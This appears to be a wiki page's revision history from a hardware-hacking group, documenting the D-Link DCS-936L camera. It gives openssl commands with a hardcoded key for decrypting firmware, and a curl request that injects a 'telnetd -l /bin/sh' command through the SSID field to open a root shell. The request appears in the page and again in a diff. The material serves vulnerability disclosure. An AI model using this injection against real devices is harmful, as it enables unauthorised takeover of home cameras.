Zenofex: Zenofex moved page DLink 936L to DLink 936L

2017-08-11T03:31:36Z

Zenofex moved page DLink 936L to DLink 936L

← Older revision		Revision as of 03:31, 11 August 2017
(No difference)

Zenofex at 12:23, 10 August 2017

2017-08-10T12:23:33Z

← Older revision		Revision as of 12:23, 10 August 2017
Line 37:		Line 37:
	--data 'wireless=1&security=0&encryption=0&wirelessBox=on&ssid=a;telnetd%20-l%20/bin/sh%20%26;SSID=&mode=0&optSecurity=0&optEncryption=TKIP&key=&extAntenna=0&channel=6' \		--data 'wireless=1&security=0&encryption=0&wirelessBox=on&ssid=a;telnetd%20-l%20/bin/sh%20%26;SSID=&mode=0&optSecurity=0&optEncryption=TKIP&key=&extAntenna=0&channel=6' \
	'http://10.255.255.1/eng/admin/adv_wireless.cgi'</pre>		'http://10.255.255.1/eng/admin/adv_wireless.cgi'</pre>

			=== Demo ===
			{{#ev:youtube\|-r6uFK--GLk}}

Zenofex: Created page with "FORCETOC {{Disclaimer}} 160px Category:DLink DCS-936L =DLink DCS-936L= The DCS-936L HD Wi-Fi Camera boasts a wide angle lens that..."

2017-08-05T12:55:43Z

Created page with "__FORCETOC__ {{Disclaimer}} left|thumb|160px Category:DLink DCS-936L =DLink DCS-936L= The DCS-936L HD Wi-Fi Camera boasts a wide angle lens that..."

New page

__FORCETOC__
{{Disclaimer}}
[[File:DLINK_936L.jpg|left|thumb|160px]]
[[Category:DLink DCS-936L]]

=DLink DCS-936L=

The DCS-936L HD Wi-Fi Camera boasts a wide angle lens that easily captures your entire room, wall-to-wall, in high-quality 720p. The built-in night vision, motion and sound detection, and a handy mobile app empower you with knowing exactly what is happening, day or night.

== Purchase ==
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.
[https://www.amazon.com/D-Link-HD-Wi-Fi-Camera-DCS-936L/dp/B01HO9XZR4/ref=as_li_ss_tl?s=electronics&ie=UTF8&qid=1501937652&sr=1-1&keywords=DLink+DCS-936L&linkCode=ll1&tag=exploiteers-20&linkId=270173eba3b2700cb65dc3fb2e5f6905 Purchase the DLink DCS-936L Camera at Amazon]

==Encrypted Firmware Update==

Firmware updates for the DCS-936L are encrypted with AES using a key, which is also encrypted.

After unpacking the firmware package, use the following command to decrypt the AES key:

<pre>openssl rsautl -decrypt -in aes.key.rsa -inkey "p.key" -out aes.key</pre>

Finally, use the following two commands to decrypt the firmware packages:

<pre>openssl aes-128-cbc -k "s7.303%_4&%&oj9e" -nosalt -d -in update.aes -out "update" || exit</pre>

<pre>openssl aes-128-cbc -k "s7.303%_4&%&oj9e" -nosalt -d -in update.bin.aes -out "update.bin" || exit</pre>

==Post Auth Root==

Command Injection:
Post auth root via arbitrary command injection due to improper sanitization of the SSID field in the wifi configuration form.

<pre>curl -i -s -k -v -X 'POST' -H 'Host: 10.255.255.1' \
-H Referer: http://10.255.255.1/eng/admin/adv_wireless.cgi \
-H 'Cookie: language=eng; usePath=null' \
-H 'Authorization: Basic <CREDS>' \
--data 'wireless=1&security=0&encryption=0&wirelessBox=on&ssid=a;telnetd%20-l%20/bin/sh%20%26;SSID=&mode=0&optSecurity=0&optEncryption=TKIP&key=&extAntenna=0&channel=6' \
'http://10.255.255.1/eng/admin/adv_wireless.cgi'</pre>

DLink 936L - Revision history

Zenofex: Zenofex moved page DLink 936L​​ to DLink 936L

Zenofex at 12:23, 10 August 2017

Zenofex: Created page with "__FORCETOC__ {{Disclaimer}} 160px Category:DLink DCS-936L =DLink DCS-936L= The DCS-936L HD Wi-Fi Camera boasts a wide angle lens that..."

Zenofex: Zenofex moved page DLink 936L to DLink 936L

Zenofex: Created page with "FORCETOC {{Disclaimer}} 160px Category:DLink DCS-936L =DLink DCS-936L= The DCS-936L HD Wi-Fi Camera boasts a wide angle lens that..."